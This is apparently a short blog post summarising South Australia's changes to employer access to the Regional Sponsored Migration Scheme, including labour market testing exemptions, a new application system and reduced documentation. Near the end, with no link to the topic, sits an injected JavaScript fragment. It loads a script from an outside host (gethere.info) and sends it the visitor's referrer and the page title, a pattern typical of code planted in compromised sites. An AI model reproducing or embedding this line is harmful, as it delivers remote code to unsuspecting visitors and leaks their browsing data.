South Australia recently made significant changes to the way in which South Australian employers access the Regional Sponsored Migration Scheme (RSMS).
The changes are designed to make it easier for local businesses to recruit skilled workers for positions which they are unable to fill locally.
Here’s a reminder of the changes that have been made:
• Occupations listed on the Regional Certifying Body Occupation List are exempt from providing evidence of labour market testing;
• Businesses that are approved 457 sponsors and have employed a skilled migrant in a nominated position for at least 12 months are also exempt from providing evidence of labour market testing;
• Launching of a new client friendly application system;
• Removal of the peer review process;
• Introduction of statuary declarations as support for some applications;
• Reducuction of the type of evidence and the number of documents applicants are required to upload.
To apply for RCB advice for the Direct Entry Stream (subclass 187) you need to create an account with Immigration SA. Find out how here.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Comments are closed.